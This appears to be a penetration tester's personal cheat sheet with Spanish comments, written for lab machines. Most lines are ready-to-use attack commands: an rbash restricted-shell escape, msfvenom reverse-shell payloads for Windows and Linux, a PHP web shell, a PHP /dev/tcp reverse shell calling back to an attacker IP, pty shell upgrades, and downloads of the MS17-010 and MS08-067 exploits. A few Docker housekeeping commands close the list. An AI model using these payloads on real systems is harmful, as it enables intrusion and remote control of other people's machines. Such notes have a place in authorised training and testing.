# Se envia el ping desde la maquina victima
ping 192.168.119.195
# Se ejecuta la escucha con tcpdump en la maquina atacante
tcpdump -i tun0 icmp
ssh alfred@10.11.1.101 -t 'bash --noprofile'
## ssh escape restricted shell
ssh mindy@x.x.x.x
#>export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH
-----------------------------------
$ ls
-rbash: /usr/bin/python: restricted: cannot specify `/' in command names
$ BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
## Error de diffie-hellman-group1-sha1
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 j0hn@10.10.10.111 -p 22000
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.119.164 LPORT=9999 > MyShell.bat
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.193 LPORT=6969 -f elf -o reverse.elf
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.240 LPORT=443 -f exe -o RevShell.exe
<?php echo shell_exec("whoami");?>
<?php echo system("0<&196;exec 196<>/dev/tcp/10.10.10.111/443; sh <&196 >&196 2>&196"); ?>
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
perl -e 'exec "/bin/bash";'
ruby: exec "/bin/bash"
curl http://10.10.10.111:32044/ -X POST -d '{"user":"d"}' -x http://127.0.0.1:8080
docker run --name ubuntu-hacker -it ubuntu /bin/bash
docker exec -it f2425e8eb82d /bin/bash
sudo apt update
sudo apt install python2
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
python2 get-pip.py
git clone https://github.com/helviojunior/MS17-010
wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
//Eliminacion de todos los contenedores
docker rmi $(docker images -a -q)
//Validacion de imagenes
docker image ls
//Obtener IP
docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' ID-CONTENEDOR